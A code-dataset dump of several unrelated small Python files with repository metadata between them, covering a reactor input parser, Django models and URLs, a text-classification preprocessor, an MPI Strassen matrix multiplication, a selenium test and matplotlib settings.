tube_dict['restart_max'] = int(data[4])
elif i == 7:
if data[0] == '0':
tube_dict['use_iterative_solver'] = False
elif data[0] == '1':
tube_dict['use_iterative_solver'] = True
else:
raise Exception('Invalid value for iSolver, {}'.format(data[0]))
tube_dict['upper_bandwidth'] = int(data[1])
tube_dict['lower_bandwidth'] = int(data[2])
elif i == 8:
tube_dict['use_coverage_effects'] = char_to_boolean(data[0])
tube_dict['use_binding_energy_corrections'] = char_to_boolean(data[1])
tube_dict['use_BEPs'] = char_to_boolean(data[2])
if data[3] == '0':
tube_dict['use_LSRs'] = False
elif data[3] == '3':
tube_dict['use_LSRs'] = True
else:
raise Exception('Invalid value for iScale, {}'.format(data[3]))
tube_dict['use_different_activation_energy'] = char_to_boolean(data[4])
tube_dict['use_omega'] = char_to_boolean(data[5])
tube_dict['omega'] = float(data[6])
tube_dict['T_ref'] = float(data[7])
elif i == 9:
tube_dict['reaction_path_analysis_mode'] = int(data[0])
tube_dict['verbose_reaction_path_analysis'] = char_to_boolean(data[1])
tube_dict['reaction_path_analysis_T'] = float(data[2])
tube_dict['sensitivity_analysis'] = char_to_boolean(data[3])
tube_dict['design_of_experiments'] = char_to_boolean(data[4])
i += 1
return tube_dict
def write_tube_inp(self, path = 'tube.inp'):
lines = []
lines.append('!irxtr (0=UHV/mol. beam, 1=batch, 2=cstr, 3=pfr) nruns MultiInput')
#lines.append('{}{}{}{}{}'.format(self.reactor_type))
lines.append('!lstp t[K] p[atm] velo[cm3/s] abyv[cm-1] trise[K]')
lines.append('!liso(yes=T,no=F) itpd (0=no, 1=UHV, 2=High Pressure) (itpd overrides liso)')
lines.append('!text aextbyv htc ramp [K/s]')
lines.append('!MARI Reactant')
lines.append('!rlen[cm3] nnodes ttout [s] rtime [s] ntdec ltra (F=only SS saved, T=transient saved)')
lines.append('!ltol abstol reltol NonNeg(F/T: constraints off/on) restart_max (<=0 means no limit)')
lines.append('!iSolver (0/1: iterative solver off/on) mu ml (upper/lower bandwidths for Krylov solver)')
lines.append('!lcov lStatpQ lBEP iScale lEA lomega omega Tref_beta (0: Tref=300K; 1: Tref=1K)')
lines.append('!mrpa verbose_rpa trpa lsen lDOE')
lines.append('EOF')
with open(path, 'w') as f_ptr:
f_ptr.write(lines[0])
def char_to_boolean(character):
if character.lower() == 't':
return True
elif character.lower() == 'f':
return False
else:
raise Exception('Invalid character, {}'.format(character))
def boolean_to_char(boolean):
if boolean:
return 'T'
else:
return 'F'
|
[
"[email protected]"
] | |
7ed42131d1dea6425f48f5cd8d6a580ebe0e2de1
|
8d150f92db0e12dcb32791892c0747ee50194cbb
|
/ex_01.py
|
120378ee94c80dc0412ae742805442adf5f209f5
|
[] |
no_license
|
wangbingde/class_day02
|
cbe1302668aa1cfe6b6a715ede149854627dc3ea
|
215cd1abb15bb31b70c62e344fe7e611a79a75b1
|
refs/heads/master
| 2020-04-07T07:10:59.613331 | 2018-11-19T05:33:51 | 2018-11-19T05:33:51 | 158,167,125 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 422 |
py
|
# 单继承
class Animal:
def eat(self):
print("吃")
def drink(self):
print("喝")
def run(self):
print("跑")
def sleep(self):
print("睡--")
class Dog(Animal):
def bark(self):
print("汪汪叫")
class XiaoTian(Dog):
def fly(self):
print("会飞")
wangcai =Dog()
wangcai.sleep()
wangcai.bark()
xiao=XiaoTian()
xiao.bark()
xiao.fly()
|
[
"[email protected]"
] | |
0285e95057b21742ade89d9041421eb988eb90fb
|
d79c152d072edd6631e22f886c8beaafe45aab04
|
/nicolock/products/rest_urls.py
|
d58d9a92a31372b447067ee3dd7508ef1d810182
|
[] |
no_license
|
kabroncelli/Nicolock
|
764364de8aa146721b2678c14be808a452d7a363
|
4c4343a9117b7eba8cf1daf7241de549b9a1be3b
|
refs/heads/master
| 2020-03-11T11:02:43.074373 | 2018-04-18T17:38:33 | 2018-04-18T17:38:33 | 129,959,455 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 690 |
py
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import, unicode_literals
from django.conf.urls import url
from . import rest_views as views
urlpatterns = [
url(
regex=r'^products/(?P<pk>\d+)/$',
view=views.ProductDetail.as_view(),
name='product-detail'
),
url(
regex=r'^products/(?P<pk>\d+)/like/$',
view=views.ProductLike.as_view(),
name='product-like'
),
url(
regex=r'^categories/$',
view=views.CategoryList.as_view(),
name='category-list'
),
url(
regex=r'^categories/(?P<pk>\d+)/$',
view=views.CategoryDetail.as_view(),
name='category-detail'
),
]
|
[
"[email protected]"
] | |
2864f464a2a9b812262b8d20279d25c2d4d19566
|
e75d2b20e7afade2c9778ab5b68369d482cb9fd0
|
/Desafio007.py
|
d957e19b9877e2391eabb33cd577d0d1a74e3f22
|
[] |
no_license
|
tamaragmnunes/Exerc-cios-extra---curso-python
|
e09bb6e507e0b1c5a3f84ecec7dbb25b8aaf27f4
|
5bfd2674101f2f41001adcf3b65414b3ef6b57ba
|
refs/heads/master
| 2020-07-26T09:10:54.536729 | 2019-09-15T13:45:06 | 2019-09-15T13:45:06 | 208,599,544 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 236 |
py
|
#Desenvolva um programa que leia as duas notas de um aluno, calcule e mostre a sua média
n1 = float(input('Digite a primeira nota: '))
n2 = float(input('Digite a segunda nota: '))
m =(n1+n2)/2
print('A sua média é {}'. format(m))
|
[
"[email protected]"
] | |
d3527c75633bd397f54893cab6262bed50e53879
|
d17d65a3ee48b307a46a0b95a05f04131668edbe
|
/TestSuite/runner.py
|
6a172fc2702d50f5b6f0558a2beab1d4f677a319
|
[] |
no_license
|
qlcfj001/ui_test
|
28fa370a6f912b2ff9a551c681d35a452c57ee02
|
25020af19d84c9c2b1bad02aca89cc881e828bbb
|
refs/heads/master
| 2023-06-15T18:10:02.177702 | 2021-07-15T06:35:10 | 2021-07-15T06:35:10 | 386,012,875 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 376 |
py
|
from Page.Base import base
from pageobjct.SearcH import Searchpage
from selenium.webdriver.common.by import By
#from TestSuite.Variablelayer.Variable import *
import time
import unittest
leave='成都'
leave_data="2021-07-20"
arrive='北京'
arrive_data='2021-07-30'
aa=Searchpage()
aa.search7(leave='成都',leave_data="2021-07-20",arrive='北京',arrive_data='2021-07-30')
|
[
"[email protected]"
] | |
b7c9571822e30c675a4bbb00ce1a6faff3a0bc1f
|
7274ce2b75d49a90c57e9220756bc9beb532c9e1
|
/preprocess/main_newsgroup_preprocess.py
|
36536c615b9bbfb43c48daa740c439bcd3c1effb
|
[] |
no_license
|
chauncyzhu/textclassification
|
4eb03f2b11abd67680daab24f373971ce33d89cd
|
0b3960f748ba66278250132d8b16d189cabe4a3f
|
refs/heads/master
| 2021-01-19T08:59:13.889878 | 2018-03-10T05:38:19 | 2018-03-10T05:38:19 | 87,704,238 | 2 | 0 | null | null | null | null |
GB18030
|
Python
| false | false | 3,853 |
py
|
# coding=gbk
import preprocess.data_clean.newsgroup.import_data as id
import preprocess.data_clean.newsgroup.clean_data as cd
import utils.newsgroup_path as path
import preprocess.transfer_vector.voca_dict.voca_data as vd #可以共用的部分
import preprocess.transfer_vector.generate_vector.feature as feature
import preprocess.transfer_vector.generate_vector.transfer_vector as tv
"""
对函数进行调用,下面部分主要是对20newsgroup语料库进行处理
"""
CONFIRM_POS_CLASS = 0 #指定二分类正类序号
#数据清理和字典获取,多分类和二分类的class_num不一样
def __voca_dict(class_num,voca_csv=None):
#读取数据并转为dataframe
#pd_train, pd_test = id.getTrainAndTest(path.SOURCEFILE) #如果训练集和测试集需要分开
pd_train = id.getPDData(path.TRAIN_TEXT)
pd_test = id.getPDData(path.TEST_TEXT)
cd.clean_data(pd_train) #分词(如果需要清理可以进行清理)
cd.clean_data(pd_test)
# 获取分类字典,如果是多分类class_num>2,如果是二分类,class_num=2
# 获取分类字典,如果是多分类class_num>2,如果是二分类,class_num=2
# pd_train = pd_train.head(100) #控制训练集个数
voca_dict = vd.getRelativeValue(pd_train, vd.getUniqueVocabulary(pd_train),
class_num) # getUniqueVocabulary比较耗时,存储在csv中
# 如需增加更多term weighting schema,在这里添加
feature.getBDCVector(voca_dict, class_num, "bdc") # 根据字典计算BDC值,需要指定index
#feature.getDFBDCVector(voca_dict, class_num, "df_bdc") # 根据字典计算DF_BDC值,需要指定index
feature.getTotalVoca(pd_test, voca_dict) # 将测试集中的特征加入到词典中
if voca_csv: # 如果存在则写入文件中
voca_dict.to_csv(voca_csv)
print(voca_dict)
return pd_train, pd_test, voca_dict
#转化为不同的向量
def __generate_vector(pd_train,pd_test,voca_dict,feature_name,train_csv=None,test_csv=None):
pd_train_copy = pd_train.copy() #防止数据干扰
pd_test_copy = pd_test.copy()
# 测试集和训练集转为向量
tv.changeToFeatureVector(pd_train_copy, voca_dict, feature_name)
tv.changeToFeatureVector(pd_test_copy, voca_dict, feature_name)
if train_csv:
pd_train_copy.to_csv(train_csv) # 写入训练文件中
if test_csv:
pd_test_copy.to_csv(test_csv) # 写入测试文件中
#多分类的数据处理操作
def multi_class_data():
class_num = 20 # 多分类的类别个数,newsgroup最多只有6个类别
pd_train, pd_test,voca_dict = __voca_dict(class_num, voca_csv=path.VOCA_MULTI_CSV) #获取多分类的字典,包括
__generate_vector(pd_train, pd_test, voca_dict,"bdc", train_csv=path.TRAIN_MULTI_BDC_CSV, test_csv=path.TEST_MULTI_BDC_CSV)
#__generate_vector(pd_train, pd_test, voca_dict,"df_bdc", train_csv=path.TRAIN_MULTI_DF_BDC_CSV, test_csv=path.TEST_MULTI_DF_BDC_CSV)
#获得二分类数据
def binary_class_data():
class_num = 2 # 二分类的类别个数
pd_train, pd_test,voca_dict = __voca_dict(class_num, voca_csv=path.VOCA_BINARY_CSV) #获取多分类的字典,包括
# 应该根据指定的正类改变二分类中的class
def f(x):
if x[CONFIRM_POS_CLASS] == 1:
return [1, 0]
else:
return [0, 1]
pd_train['class'] = pd_train['class'].apply(f)
pd_test['class'] = pd_test['class'].apply(f)
__generate_vector(pd_train, pd_test, voca_dict,"bdc", train_csv=path.TRAIN_BINARY_BDC_CSV, test_csv=path.TEST_BINARY_BDC_CSV)
__generate_vector(pd_train, pd_test, voca_dict,"df_bdc", train_csv=path.TRAIN_BINARY_DF_BDC_CSV, test_csv=path.TEST_BINARY_DF_BDC_CSV)
if __name__ == '__main__':
multi_class_data()
#binary_class_data()
|
[
"[email protected]"
] | |
719be2b3109d684559aae549572f8a866a01604c
|
f576a300274a5f491d60a2fbd06b276dac65a5da
|
/volumes.py
|
0a9a83f7c188b30aa4838f056887c48563f2e116
|
[] |
no_license
|
kashley007/SurgicalVolumes
|
76d81327987c7bf280ffd1a33057ae00495a1797
|
a5952f2cc169f45ad1fb9e3076e504f9443ed473
|
refs/heads/master
| 2020-07-21T19:36:50.317517 | 2016-11-16T17:25:07 | 2016-11-16T17:25:07 | 73,842,318 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,660 |
py
|
"""
This module executes the calculation of OR volumes
and creates a pdf report for each location found in the
data set
"""
#Import Libraries----------------------------------------------------------
import calendar
import command_line_args
import import_from_excel
import PDF
import df_manip
import endo
#--------------------------------------------------------------------------
def run_volumes_report(df, args):
"""Run a volumes report taking the parameters of df(DataFrame) and args(command-line arguments)"""
#Get all locations
location_df = df.Location.unique()
location_df = sorted(location_df, reverse=True)
if (args.month and args.year):
month_num = int(args.month)
month = calendar.month_name[month_num]
year = int(args.year)
df_month_year = df_manip.apply_month_year_filter(df, month_num, year)
total_case = 0
for i in location_df:
#Get data for month and year given at command-line
df_location = df_manip.apply_location_filter(df_month_year,i)
if(i == 'CRMH MAIN OR' ):
df_endo = endo.get_endo_cases(df_location)
total_case = len(df_endo.index)
#create PDF for location_df[i]
PDF.create_pdf(df_location, month, year, i, total_case)
else:
print("Not yet built")
#--------------------------------------------------------------------------
def main():
"""Main Program Execution"""
args = command_line_args.handle_command_line_args()
df = import_from_excel.get_excel_data(args)
run_volumes_report(df, args)
if __name__ == "__main__":
main()
|
[
"[email protected]"
] | |
0c081fd0cf2dee0806a9c57bd30da55b4a4b8187
|
6c4faabeddafecdbe11d1f8250dbff620e03fa07
|
/listings/models.py
|
1339df6f0d4266275c5abe1b27349a86d9834151
|
[] |
no_license
|
donnyboi/btre
|
20565e7c1a6411c808b38a72645a96c0d3196b44
|
174671348e680241a9af50b379595fc817596488
|
refs/heads/master
| 2020-11-26T05:08:01.996657 | 2020-03-19T07:50:13 | 2020-03-19T07:50:13 | 228,972,059 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,508 |
py
|
from django.db import models
from datetime import datetime
from realtors.models import Realtor
# Create your models here.
class Listing(models.Model):
realtor = models.ForeignKey(Realtor, on_delete=models.DO_NOTHING)
title = models.CharField(max_length=200)
address = models.CharField(max_length=200)
city = models.CharField(max_length=100)
state = models.CharField(max_length=100)
zipcode = models.CharField(max_length=20)
description = models.TextField(blank=True)
price = models.IntegerField()
title = models.CharField(max_length=200)
bedrooms = models.IntegerField()
bathrooms = models.DecimalField(max_digits=2, decimal_places=1)
garage = models.IntegerField(default=0)
sqft = models.IntegerField()
lot_size = models.DecimalField(max_digits=5, decimal_places=1)
photo_main = models.ImageField(upload_to='photos/%Y/%m/%d/')
photo_1 = models.ImageField(upload_to='photos/%Y/%m/%d/', blank=True)
photo_2 = models.ImageField(upload_to='photos/%Y/%m/%d/', blank=True)
photo_3 = models.ImageField(upload_to='photos/%Y/%m/%d/', blank=True)
photo_4 = models.ImageField(upload_to='photos/%Y/%m/%d/', blank=True)
photo_5 = models.ImageField(upload_to='photos/%Y/%m/%d/', blank=True)
photo_6 = models.ImageField(upload_to='photos/%Y/%m/%d/', blank=True)
is_published = models.BooleanField(default=True)
list_date = models.DateTimeField(default=datetime.now, blank=True)
def __str__(self):
return self.title
|
[
"[email protected]"
] | |
e8e305a6f11009f9aa86ad3315641ca93bac6171
|
59b1dc370837138dfd1820516e65c3dfbeff85f4
|
/src/Python/parallel_matrix.py
|
29ad5dd9959be0fc35e8d2b663ef7b98ab60d79e
|
[
"MIT"
] |
permissive
|
pargue/matmatmult
|
bc8fcbf0f11e434b8ad641968f2c0925010f26ca
|
32bf1f0eddc7ad11d9403e48caf4bcb99200f703
|
refs/heads/master
| 2020-12-24T08:00:03.339663 | 2016-12-14T17:36:57 | 2016-12-14T17:36:57 | 73,347,236 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 12,446 |
py
|
#!/usr/bin/env python3
"""
AUTHOR: Cody Kankel
PROG: Parallel_matrix.py
DESC: This is a Python 3 script which requires mpi4py, to implement
Strassen's Algorthm for multiplying 2 matricies in parallel. This script
will take in a matrix from the cmd line stored as a csv file, and multiply
the matrix by itself by reading in the matrix twice into two separate
variables. This script can only use 7 nodes efficiently as there are 7 clear
defined operations in Strassen's Algorthim which are used in this script ideally
on separate nodes. Ex:
mpirun -np 7 parallel_matrix.py csv/5192_5192.csv
The numpy module is used to calculate the dot product of the separate portions
of the matrix, as it uses portions of BLAS (Basic Linear Algebra Subroutines).
If IU's systems have numpy compilied which allows this feature, numpy will
take advantage of mutlicore machines and run in parallel utilizing the different
cores available.
"""
import numpy, sys, csv, math
from mpi4py import MPI
# MPI calls necesarry for all ranks
comm = MPI.COMM_WORLD
rank = comm.Get_rank()
size = comm.Get_size()
def main():
"""Main will read and initialize 2 matrices, print them,
generate the correct dot product of them, and send them off to the
strassen function to be calulated there. It is up to the user of this
program as of right now to verify the strassen method is working."""
if len(sys.argv) != 2:
sys.exit(2)
if rank == 0:
matrix_A = get_matrix(str(sys.argv[1]))
matrix_B = get_matrix(str(sys.argv[1]))
if matrix_A.shape != matrix_B.shape:
print('Error: Matrix A and Matrix B are not the same size Matrix.')
sys.exit()
a_subSize = int(get_dim(matrix_A)/2)
b_subSize = int(get_dim(matrix_B)/2)
if a_subSize != b_subSize:
print("error")
sys.exit()
a_subSize = comm.bcast(a_subSize, root=0)
startTime = MPI.Wtime()
else:
# Dumbie vars so other ranks can get into strassen function
a_subSize = None
a_subSize = comm.bcast(a_subSize, root=0)
matrix_A = numpy.empty([2,2])
matrix_B = numpy.empty([2,2])
matrix_C = strassen(matrix_A, matrix_B, a_subSize)
if rank == 0:
runTime = MPI.Wtime() - startTime
#print("Matrix C, after strassen is:")
#print(matrix_C)
print("The time to calculate strassen function in parallel is:\n", runTime)
sys.exit()
def get_matrix(fileName):
"""Function to open a specified file and read the contents using numpy's loadtxt call.
Function will return a numpy matrix (formatted). 'fileName' argument MUST be a string"""
with open(fileName, 'r') as file_ob:
reader = csv.reader(file_ob)
temp_list = list(reader)
temp_list = temp_list[0]
temp_list = list(map(int, temp_list))
matr_len = len(temp_list)
new_shape = int(math.sqrt(matr_len))
matrix = numpy.asarray(temp_list)
matrix = matrix.reshape(new_shape, new_shape)
return matrix
def strassen(A, B, subSize):
"""Function to perform the strassen algorithm on 2 numpy matricies specified as
A and B. The function will return the dot product of these two matricies
as a numpy.array matrix."""
if rank == 0:
startTime = MPI.Wtime()
# Rank 0 is the master, so it will prepare everything to be parallelized
a_11 = A[0:subSize, 0:subSize]
a_11 = numpy.ascontiguousarray(a_11)
a_12 = A[0:subSize, subSize:]
a_12 = numpy.ascontiguousarray(a_12)
a_21 = A[subSize:, 0:subSize]
a_21 = numpy.ascontiguousarray(a_21)
a_22 = A[subSize:, subSize:]
a_22 = numpy.ascontiguousarray(a_22)
b_11 = B[0:subSize, 0:subSize]
b_11 = numpy.ascontiguousarray(b_11)
b_12 = B[0:subSize, subSize:]
b_12 = numpy.ascontiguousarray(b_12)
b_21 = B[subSize:, 0:subSize]
b_21 = numpy.ascontiguousarray(b_21)
b_22 = B[subSize:, subSize:]
b_22 = numpy.ascontiguousarray(b_22)
# Setting up rank 1 for calculating m2
comm.Send(a_21, dest=1, tag=11)
comm.Send(a_22, dest=1, tag=12)
comm.Send(b_11, dest=1, tag=13)
# Setting up rank 2 for calculating m1
comm.Send(a_11, dest=2, tag=14)
comm.Send(a_22, dest=2, tag=15)
comm.Send(b_22, dest=2, tag=16)
comm.Send(b_11, dest=2, tag=17)
# Setting up rank 3 for calculating m4
comm.Send(a_22, dest=3, tag=18)
comm.Send(b_11, dest=3, tag=19)
comm.Send(b_21, dest=3, tag=20)
# Setting up rank 4 for calculating m5
comm.Send(a_11, dest=4, tag=21)
comm.Send(a_12, dest=4, tag=22)
comm.Send(b_22, dest=4, tag=23)
# Setting up rank 5 for calculating m6
comm.Send(a_11, dest=5, tag=24)
comm.Send(a_21, dest=5, tag=25)
comm.Send(b_11, dest=5, tag=26)
comm.Send(b_12, dest=5, tag=27)
# Setting up rank 6 for calculating m7
comm.Send(a_12, dest=6, tag=28)
comm.Send(a_22, dest=6, tag=29)
comm.Send(b_21, dest=6, tag=30)
comm.Send(b_22, dest=6, tag=31)
# rank 0 will now calculate m3
m3 = a_11.dot(b_12 - b_22)
# rank 0 will send m3 to rank 5 to calculate c22
comm.Send(m3, dest=5, tag=32)
# rank 0 will receive m5 from 4 for C12
m5 = numpy.arange((subSize * subSize))
comm.Recv(m5, source=4, tag=36)
m5 = m5.reshape(subSize, subSize)
# rank 0 will now calculate C12
C12 = m3 + m5
#receiving the rest of C from the other ranks
C11 = numpy.arange((subSize * subSize))
comm.Recv(C11, source=2, tag=42)
C21 = numpy.arange((subSize * subSize))
comm.Recv(C21, source=3, tag=40)
C22 = numpy.arange((subSize * subSize))
comm.Recv(C22, source=5, tag=41)
C11 = C11.reshape(subSize, subSize)
C21 = C21.reshape(subSize, subSize)
C22 = C22.reshape(subSize, subSize)
# making empty matrix
C = numpy.bmat([[C11, C12], [C21, C22]])
return C
if rank == 1:
a_21 = numpy.arange((subSize * subSize))
a_22 = numpy.arange((subSize * subSize))
b_11 = numpy.arange((subSize * subSize))
comm.Recv(a_21, source=0, tag=11)
comm.Recv(a_22, source=0, tag=12)
comm.Recv(b_11, source=0, tag=13)
a_21 = a_21.reshape(subSize, subSize)
a_22 = a_22.reshape(subSize, subSize)
b_11 = b_11.reshape(subSize, subSize)
# using numpy's matrix multiplier to calculate m2
m2 = ((a_21 + a_22).dot(b_11))
m2 = numpy.ascontiguousarray(m2)
# sending m2 other ranks to calculate portions of matrix C
comm.Send(m2, dest=5, tag=34)
comm.Send(m2, dest=3, tag=35)
return None
if rank == 2:
a_11 = numpy.arange((subSize * subSize))
a_22 = numpy.arange((subSize * subSize))
b_11 = numpy.arange((subSize * subSize))
b_22 = numpy.arange((subSize * subSize))
comm.Recv(a_11, source=0, tag=14)
comm.Recv(a_22, source=0, tag=15)
comm.Recv(b_11, source=0, tag=16)
comm.Recv(b_22, source=0, tag=17)
a_11 = a_11.reshape(subSize, subSize)
a_22 = a_22.reshape(subSize, subSize)
b_11 = b_11.reshape(subSize, subSize)
b_22 = b_22.reshape(subSize, subSize)
# using numpy's matrix multiplier to calculate m1
m1 = (a_11 + a_22).dot((b_11 + b_22))
m1 = numpy.ascontiguousarray(m1)
# sending m1 rank 5 to calulate portions of prodcut matrix C
comm.Send(m1, dest=5, tag=33)
m4 = numpy.arange((subSize * subSize))
comm.Recv(m4, source=3, tag=36)
m5 = numpy.arange((subSize * subSize))
comm.Recv(m5, source=4, tag=38)
m7 = numpy.arange((subSize * subSize))
comm.Recv(m7, source=6, tag=39)
m4 = m4.reshape(subSize, subSize)
m5 = m5.reshape(subSize, subSize)
m7 = m7.reshape(subSize, subSize)
#calculating C11
C11 = m1 + m4 - m5 + m7
C11 = numpy.ascontiguousarray(C11)
comm.Send(C11, dest=0, tag=42)
return None
if rank == 3:
a_22 = numpy.arange((subSize * subSize))
b_11 = numpy.arange((subSize * subSize))
b_21 = numpy.arange((subSize * subSize))
comm.Recv(a_22, source=0, tag=18)
comm.Recv(b_11, source=0, tag=19)
comm.Recv(b_21, source=0, tag=20)
a_22 = a_22.reshape(subSize, subSize)
b_11 = b_11.reshape(subSize, subSize)
b_21 = b_21.reshape(subSize, subSize)
# Using numpy's matrix multiplier to calculate m4
m4 = a_22.dot(b_21 - b_11)
m4 = numpy.ascontiguousarray(m4)
# Sending m4 to rank 2
comm.Send(m4, dest=2, tag=36)
#receiving 2 from rank 1
m2 = numpy.arange((subSize * subSize))
comm.Recv(m2, source=1, tag=35)
m2 = m2.reshape(subSize, subSize)
C21 = m2 + m4
C21 = numpy.ascontiguousarray(C21)
comm.Send(C21, dest=0, tag=40)
return None
if rank == 4:
a_11 = numpy.arange((subSize * subSize))
a_12 = numpy.arange((subSize * subSize))
b_22 = numpy.arange((subSize * subSize))
comm.Recv(a_11, source=0, tag=21)
comm.Recv(a_12, source=0, tag=22)
comm.Recv(b_22, source=0, tag=23)
a_11 = a_11.reshape(subSize, subSize)
a_12 = a_12.reshape(subSize, subSize)
b_22 = b_22.reshape(subSize, subSize)
m5 = (a_11 + a_12).dot(b_22)
m5 = numpy.ascontiguousarray(m5)
# Sending m5 to ranks to calculate portions of C
comm.Send(m5, dest=0, tag=36)
comm.Send(m5, dest=2, tag=38)
return None
if rank == 5:
a_11 = numpy.arange((subSize * subSize))
a_21 = numpy.arange((subSize * subSize))
b_11 = numpy.arange((subSize * subSize))
b_12 = numpy.arange((subSize * subSize))
comm.Recv(a_11, source=0, tag=24)
comm.Recv(a_21, source=0, tag=25)
comm.Recv(b_11, source=0, tag=26)
comm.Recv(b_12, source=0, tag=27)
a_11 = a_11.reshape(subSize, subSize)
a_21 = a_21.reshape(subSize, subSize)
b_11 = b_11.reshape(subSize, subSize)
b_12 = b_12.reshape(subSize, subSize)
m6 = (a_21 - a_11).dot(b_11 + b_12)
# receiving m3, m1, m2 to calculate c22
m3 = numpy.arange((subSize * subSize))
comm.Recv(m3, source=0, tag=32)
m1 = numpy.arange((subSize * subSize))
comm.Recv(m1, source=2 , tag=33)
m2 = numpy.arange((subSize * subSize))
comm.Recv(m2, source=1, tag=34)
m3 = m3.reshape(subSize, subSize)
m1 = m1.reshape(subSize, subSize)
m2 = m2.reshape(subSize, subSize)
#calculate C22
C22 = m1 -m2 + m3 + m6
C22 = numpy.ascontiguousarray(C22)
comm.Send(C22, dest=0, tag=41)
return None
if rank == 6:
a_12 = numpy.arange((subSize * subSize))
a_22 = numpy.arange((subSize * subSize))
b_21 = numpy.arange((subSize * subSize))
b_22 = numpy.arange((subSize * subSize))
comm.Recv(a_12, source=0, tag=28)
comm.Recv(a_22, source=0, tag=29)
comm.Recv(b_21, source=0, tag=30)
comm.Recv(b_22, source=0, tag=31)
a_12 = a_12.reshape(subSize, subSize)
a_22 = a_22.reshape(subSize, subSize)
b_21 = b_21.reshape(subSize, subSize)
b_22 = b_22.reshape(subSize, subSize)
m7 = (a_12 - a_22).dot((b_21 + b_22))
m7 = numpy.ascontiguousarray(m7)
comm.Send(m7, dest=2, tag=39)
return None
def get_dim(matrix):
"""Function to get the dim of a matrix and return. Assumes the matricies are
already square. Returns an integer for the dim of the matrix"""
return int((str(matrix.shape).split(',')[0].replace('(','')))
# Standard boilerplate to call the main() function.
if __name__ == '__main__':
main()
|
[
"[email protected]"
] | |
a037aadb28a082e3c64b0d78e14d175f29d0182b
|
779515ef9cb52d13c8f6c46623ec8906ac658452
|
/utils/emoji.py
|
436a96bd1585e415b52958284aaacfef43cc33c8
|
[
"MIT"
] |
permissive
|
Chrrapek/DiscordMiejski
|
ca014b81f4d41efe7cc9ac28913da9b29afc64e0
|
fd59433c1315baadd91a9ef29ca534924bcdc7f4
|
refs/heads/master
| 2023-04-14T20:59:44.765418 | 2021-04-12T19:18:53 | 2021-04-12T19:18:53 | 303,675,183 | 3 | 2 |
MIT
| 2021-04-12T19:18:54 | 2020-10-13T11:05:09 |
Python
|
UTF-8
|
Python
| false | false | 65 |
py
|
PEPE_SAD = 775061981496606740
PEPE_NAWROCKI = 775059704795758602
|
[
"[email protected]"
] | |
fcaf5d0a55c1039dcaa09d5b5481a8e32e5b4f85
|
52d77c903a5f00fd55985394cd17ee380aaf3ccf
|
/script/Utils.py
|
bdba0a8a74c2251dc082020e61e7724bc1dae669
|
[] |
no_license
|
alexanderflorean/BSc-JavSoCoClassifier
|
7b60ac5df6860c2ec1d7a47fddfba3f14b105b84
|
a6fe7a6fec06beca9f2940cf9c2cdd08bbdaab1a
|
refs/heads/main
| 2023-04-26T06:09:04.250918 | 2021-06-08T13:04:33 | 2021-06-08T13:04:33 | 349,335,825 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,936 |
py
|
import yaml
# minimum of available 5 test files regardless of training size.
MIN_NUM_OF_TEST_FILES = 5
def remove_label_column_from_dataframe(dataFrame, label):
return dataFrame[dataFrame["Label"].isin(label) == False].reset_index(drop=True)
def remove_concerns_under_quantity_threshold(dataFrame, minNumOfFiles=5):
labels = dataFrame.Label.unique()
x_quantity = [len(dataFrame.loc[dataFrame["Label"] == label]) for label in labels]
to_be_removed_labels = []
for pos in range(len(labels)):
if x_quantity[pos] < minNumOfFiles + MIN_NUM_OF_TEST_FILES:
to_be_removed_labels.append(labels[pos])
return remove_label_column_from_dataframe(dataFrame, to_be_removed_labels)
def read_yaml_file(path_to_yaml: str):
try:
with open(path_to_yaml, "r") as file:
config = yaml.safe_load(file)
return config
except Exception as e:
print(e + ": Error reading the yaml file: " + path_to_yaml)
def make_dataframe_row(metrics, setting: list, feature_rep: str, setting_id: str) -> dict:
report = metrics.get_classification_report()
quantity_table = metrics.quantity_table()
row = {
"classifier": metrics.name,
"setting_id": setting_id,
"Feature rep.": feature_rep,
"settings": setting,
"accuracy": report["accuracy"],
"macro_precision": report["macro avg"]["precision"],
"macro_recall": report["macro avg"]["recall"],
"weighted_precision": report["weighted avg"]["precision"],
"weighted_recall": report["weighted avg"]["recall"],
"macro_f1": report["macro avg"]["f1-score"],
"weighted_f1": report["weighted avg"]["f1-score"],
"train_size": quantity_table["Train"].sum(),
"test_size": quantity_table["Test"].sum(),
"report_table": metrics.total_report_table(),
}
return row
|
[
"[email protected]"
] | |
7cb0f559cf1a4f0d1a677006477fa65e55752236
|
b1e9991736e1fe83d3886dcb5c860dc94a31af2b
|
/matplotlibrc.py
|
dbebae19a11784998b797d88525705478349e408
|
[] |
no_license
|
bbw7561135/TurbulentDynamo
|
e98748171aff47cf3ec75db3b98e0b2c8dbdf280
|
cba1e7a06ea9434ff3d8d3f9e8482677b0274c2f
|
refs/heads/master
| 2022-12-25T03:37:12.973978 | 2020-08-31T01:11:24 | 2020-08-31T01:11:24 | 294,576,179 | 2 | 1 | null | 2020-09-11T02:42:17 | 2020-09-11T02:42:16 | null |
UTF-8
|
Python
| false | false | 1,166 |
py
|
from matplotlib import rcParams
# rcParams.keys()
rcParams['text.usetex'] = True
rcParams['text.latex.preamble'] = r'\usepackage{bm}'
rcParams['lines.linewidth'] = 1.2
rcParams['font.family'] = 'Arial'
rcParams['font.size'] = 15
rcParams['axes.linewidth'] = 0.8
rcParams['xtick.top'] = True
rcParams['xtick.direction'] = 'in'
rcParams['xtick.minor.visible'] = True
rcParams['xtick.major.size'] = 6
rcParams['xtick.minor.size'] = 3
rcParams['xtick.major.width'] = 0.75
rcParams['xtick.minor.width'] = 0.75
rcParams['xtick.major.pad'] = 5
rcParams['xtick.minor.pad'] = 5
rcParams['ytick.right'] = True
rcParams['ytick.direction'] = 'in'
rcParams['ytick.minor.visible'] = True
rcParams['ytick.major.size'] = 6
rcParams['ytick.minor.size'] = 3
rcParams['ytick.major.width'] = 0.75
rcParams['ytick.minor.width'] = 0.75
rcParams['ytick.major.pad'] = 5
rcParams['ytick.minor.pad'] = 5
rcParams['legend.fontsize'] = 15
rcParams['legend.labelspacing'] = 0.2
rcParams['legend.loc'] = 'upper left'
